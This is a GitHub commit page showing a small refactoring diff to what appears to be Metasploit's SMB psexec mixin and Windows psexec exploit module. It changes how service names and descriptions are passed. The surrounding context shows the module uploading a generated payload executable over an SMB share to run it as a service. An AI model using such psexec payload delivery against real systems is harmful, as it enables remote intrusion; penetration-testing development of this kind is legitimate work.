Skip to content
Permalink
Browse files

rebase to use the mixin psexec

  • Loading branch information...
agix committed Apr 2, 2014
1 parent d3f2414 commit 1a3b31926285cb0d219d6f3cd28a937e80579e67
Showing with 2 additions and 6 deletions.
  1. +0 −1 lib/msf/core/exploit/smb/psexec.rb
  2. +2 −5 modules/exploits/windows/smb/psexec.rb
@@ -72,7 +72,6 @@ def psexec(command, disconnect=true, service_description=nil, service_name=nil,
end
servicename = service_name || Rex::Text.rand_text_alpha(11)
displayname = display_name || Rex::Text.rand_text_alpha(16)
servicedescription = service_description || Rex::Text.rand_text_alpha(rand(32)+1)

svc_handle = nil
svc_status = nil
@@ -155,7 +155,7 @@ def exploit
simple.disconnect("ADMIN$")
else
servicename = datastore['SERVICE_NAME'] || rand_text_alpha(8)
servicedescription = datastore['SERVICE_DESCRIPTION'] || rand_text_alpha(rand(32)+1)
servicedescription = datastore['SERVICE_DESCRIPTION']
displayname = datastore['SERVICE_DISPLAYNAME'] || 'M' + rand_text_alpha(rand(32)+1)

# Upload the shellcode to a file
@@ -179,9 +179,6 @@ def exploit
end
exe = ''
opts = { :servicename => servicename }
if (datastore['PAYLOAD'].include? 'x64')
opts.merge!({ :arch => ARCH_X64 })
end
exe = generate_payload_exe_service(opts)

fd << exe
@@ -205,7 +202,7 @@ def exploit
file_location = "\\\\127.0.0.1\\#{smbshare}\\#{fileprefix}\\#{filename}"
end

psexec(file_location, false, servicedescription)
psexec(file_location, false, servicedescription, servicename, displayname)

print_status("Deleting \\#{filename}...")
sleep(1)

0 comments on commit 1a3b319

Please sign in to comment.
You can’t perform that action at this time.